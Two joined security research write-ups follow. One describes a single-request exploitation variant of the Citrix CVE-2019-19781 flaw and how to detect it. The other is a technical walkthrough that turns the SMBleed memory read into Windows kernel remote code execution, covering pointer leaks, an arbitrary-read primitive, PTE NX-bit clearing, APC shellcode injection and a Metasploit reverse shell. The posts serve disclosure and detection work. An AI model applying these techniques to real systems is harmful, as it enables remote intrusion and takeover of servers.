Once the XML file has been written, we can then follow up with a request for the XML file, resulting in our code being executed:

Triggering Code Execution

So now we can exploit the issue without any vulnerable Perl file existing on the target server! But can we do better? Can the issue be exploited with only a single HTTP request to a non-existent file? Let’s take another look at the Handler.pm module.

On line 19, the csd function is called. As discussed, this causes our target XML file to be written to the templates directory:

Call to csd Function

Afterwards, on line 32 the requested file is rendered as a template:

Template Rendering

This means that our XML file is written just before the requested file is rendered. What if we craft an HTTP request that both writes and requests our XML file? The following screenshot shows how this works. First we send our crafted NSC_USER header, whilst also requesting the same file within the GET request path. This results in the XML file being first written, and then rendered straight afterwards, leading to code execution in a single HTTP request, without any vulnerable Perl file!

Successful Exploitation with Single Request

Note that aside from bypassing adversary patches that delete the “vulnerable” Perl files such as newbm.pl from the server, this method will also bypass the NOTROBIN method of checking for (and deleting) XML files within the template directory. This is due to a race-condition in that our XML file is written and rendered within the same request, and thus executed before it can be deleted.

Some Final Questions

Now we’ve shown a new method to exploit the vulnerability, and how to bypass adversary patches. However, we still have some other questions to answer.

Does the Citrix/FireEye IOC scanner detect this method?

Yes, it does. This is because their success_regexes[0] regex takes care of detecting any request (regardless of HTTP request method or version) that requests a file ending with .xml, which is a constraint of the vulnerability, and something which we cannot, as an attacker, control. The script additionally looks for responses with a 304 status code, which addresses a simple bypass technique of specifying an If-None-Match: * header to solicit a 304 instead of 200 status code.

Successful Detection via Regex

Furthermore, unless the attacker deletes the dropped .xml and compiled .ttc2 files, these will also be present on the filesystem and detectable via the IOC checker script. The following screenshot shows the Citrix/FireEye IOC scanner detecting exploitation via this technique:

IOC Scanner Detection

Readers may have read in FireEye’s “404 Exploit Not Found” blog post that the attacker behind the NOTROBIN attacks also used a single HTTP request method to exploit the issue. Our understanding is that this is not the same technique. The reason for this is that FireEye describes the attacker requesting the newbm.pl Perl script via a POST request, resulting in a 304 response (presumably using the If-None-Match/If-Modified-Since trick). Discounting the fact that the request method can be arbitrary, our method does not make use of the newbm.pl file.

FireEye “404 Exploit Not Found” Blog

How can the single request exploit be detected?

As demonstrated above, the Citrix/FireEye IOC scanner still detects the single request variant from an endpoint perspective. Looking at the constraints of this new exploitation method, plus everything we have learned about obfuscation of request methods etc., we know that the request must:

  1. Contain `/vpns/portal/` within the path of the request
  2. Contain an `NSC_USER` header with a traversal `../` sequence
  3. End with `.xml`

However, the request may:

  1. Be any request method type (e.g. `GET`, `HEAD`, `PUT`, `FOO`, `BAR`)
  2. Be split into multiple requests, e.g. one request to trigger the XML file drop, another to the XML (similar to the original exploit)
  3. Result in a 200 response, but could also result in a 304
  4. Contain a traversal `../` sequence in the request path – this depends on whether the request is made to the management or virtual IP interface
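
The constraints above can be combined into a method-agnostic check. The following Python sketch is only an illustration: `classify_request` and its labels are hypothetical, it is not the logic of the Citrix/FireEye scanner, and it will also label benign requests for .xml files under /vpns/portal/, so it should be read as a triage aid rather than a verdict.

```python
from urllib.parse import unquote


def classify_request(path: str, headers: dict):
    """Label a request by the constraints listed above; the method is ignored."""
    # Drop any query string and decode percent-encoding before matching.
    decoded_path = unquote(path.split("?", 1)[0])
    normalised = {name.lower(): value for name, value in headers.items()}
    nsc_user = unquote(normalised.get("nsc_user", ""))

    if "/vpns/portal/" not in decoded_path:
        return None
    has_traversal = "../" in nsc_user
    wants_xml = decoded_path.lower().endswith(".xml")

    if has_traversal and wants_xml:
        return "single-request"   # write and render in one request
    if has_traversal:
        return "xml-drop"         # first half of a split exploit
    if wants_xml:
        return "xml-render"       # second half of a split exploit
    return None


print(classify_request("/vpns/portal/demo.xml", {"nsc_user": "../../demo"}))
print(classify_request("/vpns/portal/ping.html", {"NSC_USER": "../../demo"}))
print(classify_request("/vpns/portal/demo.xml", {}))
print(classify_request("/index.html", {"NSC_USER": "../../demo"}))
```

Leaving the request method and HTTP version out of the function signature is deliberate, since neither can be relied upon.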

Finally, another question you may be wondering – perhaps you are worried that you applied the Citrix mitigation too late, and that an attacker may have “adversary patched” your Citrix server for you. Of course, in this scenario, the best course of action is to complete an examination of the server to identify any potential backdoors or attacker-deployed patches. For this, we thoroughly recommend the official IOC script provided by Citrix/FireEye. However, given that logs typically only persist for a couple of days, and that sophisticated actors may remove logs, it can be difficult to ascertain the level of intrusion by only looking at the Citrix device itself. If your device was patched after public exploits were released, it is highly likely that the device was compromised.

Latest Statistics

Here are the latest statistics based on the latest available data (as of June 2020):

Patched (but backdoored) vs. Unpatched (but backdoored)
  • 8115 servers were identified that are still vulnerable to CVE-2019-19781
  • Of the 8115 vulnerable servers, 2508 (30.9%) have indicators of adversary patching
    • These 2508 servers remain vulnerable due to the new discovery of the exploit method described in this blog
  • A total of 3,332 unique servers were identified to contain known indicators of compromise
  • 23% of the compromised servers had been officially patched, but were still backdoored
  • Many hosts contained multiple indicators and backdoors from distinct actors, in some cases up to 5 different indicators were observed
  • 49% of compromised devices were located in the US

Breakdown by Country

It has been just over six months since CVE-2019-19781 was first announced and a mitigation made available. Yet the number of vulnerable and compromised hosts found in the wild is shockingly high. Furthermore, whilst we have been able to identify a subset of compromised devices, the true number is likely much higher. This is due to a number of reasons. Firstly, we were only able to observe a limited number of known IoCs, not all of which can be observed based on the datasets we have access to. Secondly, the majority of the backdoors and webshells we’ve seen deployed still operate perfectly fine even after the server has been patched. These backdoors typically require no authentication or use a hardcoded password, meaning that anyone could use them as a method to gain remote access. We just don’t have a way of identifying the true number of patched-but-backdoored devices out there. Therefore, we believe that our statistics represent just the tip of the iceberg.

It can no longer be assumed that a device is free of compromise just because it was patched. Nor can it be assumed that a device which was compromised and “patched” by one attacker cannot be compromised by another attacker using the technique described in this publication. Not all attackers share the same motives. Whilst the MO of attackers deploying adversary patching might simply be to “hoard” access until later, other attackers may have more insidious, immediate motives, such as financial gain through ransomware. The most likely reason we haven’t seen many more backdoors deployed in the wild is adversary patching. However, as we have demonstrated, this both provides a false sense of security and obscures the true number of compromised devices that may be out there.

We hope that this publication helps to highlight the issue, provides additional visibility into techniques being used in the wild, dispels a few misconceptions about the vulnerability itself, and demonstrates more robust ways to detect exploit variants. We urge organizations to ensure that their devices are not only patched, but that care is taken to ensure that latent compromises have been identified and remediated.

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

28 June 2020 at 08:41

Introduction

Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has fewer limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try to read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us groom the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.

SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  LIST_ENTRY ConnectionBufferList; // (orange)
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  PBYTE UserBufferPtr; // (blue)
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  PBYTE PoolAllocationPtr; // (blue)
/*38*/  PMDL pMdl1; // (blue)
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  PMDL pMdl2; // (blue)
/*58*/  PVOID pSrvNetWskStruct; // (orange)
/*60*/  DWORD SmbFlags;
/*64*/  PVOID TracingPtr1; // (orange)
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  PVOID TracingPtr2; // (orange)
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overwritten by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is no more useful than reading one of the blue-colored pointers. By the way, if you search for “pSrvNetWskStruct” you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.
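
As a sketch of how leaked header bytes could be interpreted, the layout above can be expressed with Python’s `struct` module. The field names and offsets come from the struct definition; `HDR`, `SrvnetBufferHdr` and `parse_header` are hypothetical names, pointers are assumed to be 64-bit little-endian values, and the sample bytes are made up.

```python
import struct
from collections import namedtuple

# (name, struct format) pairs in declaration order. The "<" prefix disables
# padding, matching #pragma pack(push, 1).
FIELDS = [
    ("Flink", "Q"), ("Blink", "Q"),               # ConnectionBufferList
    ("BufferFlags", "H"), ("LookasideListIndex", "H"),
    ("LookasideListLogicalProcessor", "H"), ("TracingDataCount", "H"),
    ("UserBufferPtr", "Q"),
    ("UserBufferSizeAllocated", "I"), ("UserBufferSizeUsed", "I"),
    ("PoolAllocationSize", "I"), ("unknown1", "4s"),
    ("PoolAllocationPtr", "Q"), ("pMdl1", "Q"),
    ("BytesProcessed", "I"), ("unknown2", "4s"),
    ("BytesReceived", "Q"), ("pMdl2", "Q"), ("pSrvNetWskStruct", "Q"),
    ("SmbFlags", "I"),
    ("TracingPtr1", "Q"), ("TracingUnknown1", "Q"),
    ("TracingPtr2", "Q"), ("TracingUnknown2", "Q"),
    ("unknown3", "12s"),
]
HDR = struct.Struct("<" + "".join(fmt for _, fmt in FIELDS))
SrvnetBufferHdr = namedtuple("SrvnetBufferHdr", [name for name, _ in FIELDS])


def parse_header(raw: bytes) -> SrvnetBufferHdr:
    """Unpack the first HDR.size bytes of raw into named fields."""
    return SrvnetBufferHdr._make(HDR.unpack(raw[:HDR.size]))


# Build a made-up header: only the list pointers and UserBufferPtr are set.
sample = bytearray(HDR.size)
struct.pack_into("<QQ", sample, 0x00, 0xFFFF800011112222, 0xFFFF800011112222)
struct.pack_into("<Q", sample, 0x18, 0xFFFF800033334050)
hdr = parse_header(bytes(sample))
print(hex(HDR.size), hex(hdr.Flink), hex(hdr.UserBufferPtr))
```

Writing the sample values at the documented offsets (0x00 and 0x18) and reading them back by name is a quick way to confirm that the format string agrees with the offsets in the struct comments.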

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there either. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can overwrite those pointers in SRVNET_RECV, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (meaning the buffer is part of a lookaside list) and 0x01 (meaning the buffer has no transport header) are set, some operations are performed on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at them purely in terms of memory manipulation, we can see that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16 and 29 of the listing above), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The bytes in curly braces, colored orange in the original figure, contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.
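
The reordering mentioned in step 4 can be sketched in a few lines of Python. This is a minimal illustration rather than code taken from the POC: it assumes the standard x64 MDL layout (StartVa at offset 0x20, ByteOffset at offset 0x2C), the function names are hypothetical, and it assumes the 0x50 that SrvNetFreeBuffer adds to MappedSystemVa has to be subtracted again. The simulate_free_side_effect helper only models the writes into buffer A so that the recovery can be checked offline.

```python
import struct

# Offsets inside an x64 MDL (assumed standard layout).
MDL_FLAGS_OFFSET = 0x0A
MDL_STARTVA_OFFSET = 0x20
MDL_BYTEOFFSET_OFFSET = 0x2C
HEADER_ADJUSTMENT = 0x50  # added to MappedSystemVa by SrvNetFreeBuffer


def simulate_free_side_effect(original_pointer: int) -> bytes:
    """Model what ends up in buffer A for a given pointer value (hypothetical helper)."""
    adjusted = (original_pointer + HEADER_ADJUSTMENT) & 0xFFFFFFFFFFFFFFFF
    buf = bytearray(0x30)
    struct.pack_into("<H", buf, MDL_FLAGS_OFFSET, 0x0004)           # MdlFlags
    struct.pack_into("<Q", buf, MDL_STARTVA_OFFSET, adjusted & ~0xFFF)
    struct.pack_into("<I", buf, MDL_BYTEOFFSET_OFFSET, adjusted & 0xFFF)
    return bytes(buf)


def recover_pointer(user_buffer: bytes) -> int:
    """Recombine the page-aligned part and the page offset, then undo the +0x50."""
    (start_va,) = struct.unpack_from("<Q", user_buffer, MDL_STARTVA_OFFSET)
    (byte_offset,) = struct.unpack_from("<I", user_buffer, MDL_BYTEOFFSET_OFFSET)
    return (start_va | byte_offset) - HEADER_ADJUSTMENT
```

The upper 52 bits of the pointer come from StartVa and the lower 12 bits from ByteOffset, which is why both fields are needed.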

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECV struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC; it is left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed to by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.
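
The arithmetic described above can be sketched as follows. This is an illustration under stated assumptions, not the POC code: the build names and offsets are made up, the function names are hypothetical, and the only property relied upon is that a module base is page-aligned, so the low 12 bits of the leaked pointer must equal the low 12 bits of the symbol’s offset within the module.

```python
PAGE_MASK = 0xFFF


def module_base(leaked_pointer: int, symbol_offset: int) -> int:
    """Subtract the known offset of the symbol from the leaked pointer."""
    base = leaked_pointer - symbol_offset
    if base & PAGE_MASK:
        raise ValueError("result is not page-aligned; wrong offset or bad read")
    return base


def matching_builds(leaked_pointer: int, known_offsets: dict) -> list:
    """Return the builds whose symbol offset is consistent with the leaked pointer."""
    return [
        build
        for build, offset in known_offsets.items()
        if (leaked_pointer - offset) & PAGE_MASK == 0
    ]


# Hypothetical offsets of SrvNetWskConnDispatch in two srvnet.sys builds.
EXAMPLE_OFFSETS = {"build_a": 0x2D170, "build_b": 0x2E1A8}
```

If more than one build matches, the low bits alone are not enough and an additional leaked pointer would be needed to disambiguate.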

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR*)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR*)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECV struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though an 8-argument function is intended to be called, we can replace the pointer with a function that expects a different number of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECV struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECV struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECV struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECV struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was find a convenient function that copies memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the number of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited to functions implemented in srvnet.sys: we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings, which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct, which holds a pointer to the string and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data.
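
To make the struct concrete, here is a small sketch of how a UNICODE_STRING is laid out on x64: a 16-bit Length, a 16-bit MaximumLength, four bytes of padding, and an 8-byte Buffer pointer, for 16 bytes in total. The function name and the example address are hypothetical and only serve to show the layout.

```python
import struct

# x64 UNICODE_STRING: USHORT Length, USHORT MaximumLength, 4 bytes padding, PWSTR Buffer.
UNICODE_STRING_FORMAT = "<HH4xQ"
UNICODE_STRING_SIZE = struct.calcsize(UNICODE_STRING_FORMAT)


def pack_unicode_string(buffer_address: int, length: int, maximum_length=None) -> bytes:
    """Serialize a UNICODE_STRING describing `length` bytes at `buffer_address`."""
    if maximum_length is None:
        maximum_length = length
    if not 0 <= length <= maximum_length <= 0xFFFF:
        raise ValueError("lengths must fit in 16 bits and Length <= MaximumLength")
    return struct.pack(UNICODE_STRING_FORMAT, length, maximum_length, buffer_address)
```

Because both length fields are 16 bits wide, a single UNICODE_STRING can describe at most 0xFFFF bytes, so larger regions have to be read in several calls.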

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers; using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.
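
The calculation in step 4 is plain paging arithmetic and can be sketched as below. This is an illustration of the formula, not the POC code: the function names are hypothetical, the mask corresponds to the x64 four-level page table layout, and the base value used in the example is the fixed, pre-randomization base found on older Windows versions, chosen only because it makes the result easy to check.

```python
PTE_INDEX_MASK = 0x7FFFFFFFF8   # keeps the 36-bit page number scaled by 8 bytes per PTE
NX_BIT = 1 << 63                # no-execute bit of an x64 page table entry
U64_MASK = 0xFFFFFFFFFFFFFFFF


def pte_address(virtual_address: int, pte_base: int) -> int:
    """Address of the page table entry that maps `virtual_address`."""
    return pte_base + ((virtual_address >> 9) & PTE_INDEX_MASK)


def clear_nx(pte_value: int) -> int:
    """Return the PTE value with the no-execute bit cleared."""
    return pte_value & ~NX_BIT & U64_MASK


KUSER_SHARED_DATA = 0xFFFFF78000000000
LEGACY_PTE_BASE = 0xFFFFF68000000000  # non-randomized base, used here for illustration only
```

Offset 0x800 lies in the same 4 KB page as the start of KUSER_SHARED_DATA, so both addresses map to the same page table entry.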

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 RS5 (version 1809) and newer. Since Windows 10 RS5, UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work; we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on lookaside list buffer reuse, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

Allocation size →  0x1100  0x2100  0x4100  0x8100  0x10100  0x20100  0x40100  0x80100  0x100100
Processor 1        📝      📝      📝      📝      📝       📝       📝       📝       📝
Processor 2        📝      📝      📝      📝      📝       📝       📝       📝       📝
Processor n        📝      📝      📝      📝      📝       📝       📝       📝       📝

Each cell with the “📝” symbol is a separate lookaside list.
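
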